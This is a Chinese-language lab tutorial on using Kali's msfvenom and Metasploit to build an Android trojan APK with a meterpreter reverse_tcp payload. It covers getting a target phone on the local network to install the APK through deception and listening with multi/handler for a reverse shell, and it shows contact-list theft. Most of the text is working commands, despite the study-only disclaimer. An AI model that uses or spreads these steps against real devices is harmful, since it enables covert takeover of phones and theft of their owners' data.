聲明:本文僅限於技術討論與學習,嚴禁用於非法途徑,否則后果自負。
原理:借助kali的Metasploit滲透測試框架生成遠程木馬,然后感染局域網內Android手機,從而實現對被滲透手機數據的讀取等。
實驗前准備:
kali虛擬機:192.168.0.102(攻擊機)
win10中間機:用於將kali生成的遠程木馬發送到Android手機中。
Android手機:192.168.0.105(靶機)
Xshell4:用於將在kali上生成的遠程木馬從kali中導到win10中間機中。
實驗過程:
一、kali生成遠程木馬
1.利用msfvenom生成木馬病毒,payload選擇android/meterpreter/reverse_tcp,后接kali虛擬機的名字和端口:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.102 LPORT=8888 R > /root/android.apk
2. 檢查文件的生成:
二、木馬傳送
利用win10中的Xshell4將kali中生成的android.apk傳送到指定路徑(本實驗指定路徑為F:\),再誘導Android手機(靶機)安裝。
1.用Xshell4連接kali虛擬機並將android.apk傳送到指定路徑:
2.將F盤下的android.apk誘導發送到目標靶機上安裝。
目標靶機上安裝完成木馬后會出現如下圖標:
三、目標攻擊
1.msf監聽
kali虛擬機終端依次執行以下命令:
msfconsole //啟動msfconsole
use exploit/multi/handler //加載模塊
set payload android/meterpreter/reverse_tcp //選擇payload
set LHOST 192.168.0.102
set LPORT 8888
exploit //開始執行漏洞,開始監聽,等待目標上線
在目標手機上點一下木馬文件(沒有頁面),則可成功建立攻擊會話:
查看上述文件:
上述實驗演示的是竊取目標靶機通訊錄,如果對其他命令感興趣的話可通過help命令自行嘗試。
提醒:本實驗僅用於技術討論與學習,嚴禁用於非法途徑,否則后果自負。